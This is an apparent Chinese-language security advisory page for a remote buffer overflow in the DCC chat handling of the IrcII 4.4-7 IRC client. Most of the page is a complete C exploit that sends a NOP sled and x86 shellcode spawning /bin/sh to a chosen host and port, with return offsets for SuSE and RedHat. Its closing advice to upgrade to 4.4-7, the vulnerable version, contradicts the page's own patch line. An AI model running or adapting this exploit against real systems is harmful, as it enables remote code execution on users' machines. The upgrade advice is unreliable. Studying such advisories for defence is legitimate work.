首页 -> 安全研究
安全研究
安全漏洞
IrcII 4.4-7 DCC Chat 远程溢出漏洞
发布日期:2000-03-14
更新日期:2000-03-14
受影响系统:
Michael Sandrof IrcII 4.4-7不受影响系统:
- S.u.S.E. Linux 6.3
- RedHat Linux 6.1 i386
Michael Sandrof IrcII 4.4M描述:
IrcII是一个著名的unix下的IRC客户端程序。IrcII v 4.4-7以及更老版本的DCC chat实现
中存在一个缓冲区溢出漏洞。因此,当一个IrcII client尝试初始化一个DCC chat连接时,
可能被远程攻击者攻击,以运行client的用户身份去执行任意代码。
<* 来源:bladi <bladi@euskalnet.net> *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
ircii-4.4 exploit by bladi & aLmUDeNa
buffer overflow in ircii dcc chat's
allow to excute arbitrary
Affected:
ircII-4.4
Patch:
Upgrade to ircII-4.4M
ftp://ircftp.au.eterna.com.au/pub/ircII/ircii-4.4M.tar.gz
Offset:
SuSe 6.x :0xbfffe3ff
RedHat :0xbfffe888
Thanks to : #warinhell,#hacker_novatos
Special thanks go to: Topo[lb],
Saludos para todos los que nos conozcan especialmente para eva ;)
(bladi@euskalnet.net)
*/
#include <stdio.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
char *h_to_ip(char *hostname);
char *h_to_ip(char *hostname) {
struct hostent *hozt;
struct sockaddr_in tmp;
struct in_addr in;
if ((hozt=gethostbyname(hostname))==NULL)
{
printf(" ERROR: IP incorrecta\n");
exit(0);
}
memcpy((caddr_t)&tmp.sin_addr.s_addr, hozt->h_addr, hozt->h_length);
memcpy(&in,&tmp.sin_addr.s_addr,4);
return(inet_ntoa(in));
}
main(int argc, char *argv[])
{
struct sockaddr_in sin;
char *hostname;
char nops[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char *shell =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int outsocket,tnt,i;
printf (" irciismash ver: 1.0\n");
printf (" by \n");
printf (" bladi & aLmUDeNa\n\n");
if (argc<3)
{
printf("Usage : %s hostname port\n",argv[0]);
exit(-1);
}
hostname=argv[1];
outsocket=socket(AF_INET,SOCK_STREAM,0);
sin.sin_family=AF_INET;
sin.sin_port=htons(atoi(argv[2]));
sin.sin_addr.s_addr=inet_addr(h_to_ip(hostname));
if (connect (outsocket, (struct sockaddr *) &sin, sizeof(sin)) == -1) {
printf(" ERROR: El puerto esta cerradito :_(\n");
exit(0);
}
printf("[1]- Noping\n [");
for(i=0;i<47;i++)
{
if (!(i % 7)) { usleep (9); printf("."); fflush(stdout); }
write(outsocket,nops,strlen(nops));
}
printf("]\n");
printf(" Noped\n");
printf("[2]- Injectin shellcode\n");
write(outsocket,shell,strlen(shell));
usleep(999);
printf(" Injected\n");
printf("[3]- Waiting\n [");
for(i=0;i<299;i++)
{
printf(".");
fflush(stdout);
usleep(99);
write(outsocket,"\xff",strlen("\xff"));
write(outsocket,"\xbf",strlen("\xff"));
write(outsocket,"\xff",strlen("\xe9"));
write(outsocket,"\xe3",strlen("\xff"));
}
printf("]\n[4]- Xploit \n - --(DoNe)-- -\n");
close(outsocket);
}
建议:
请尽快更新到Michael Sandrof IrcII 4.4-7版.
它可以从下列地址下载:
ftp://ircftp.au.eterna.com/pub/ircII/ircii-4.4M.tar.gz
浏览次数:7259
严重程度:0(网友投票)
绿盟科技给您安全的保障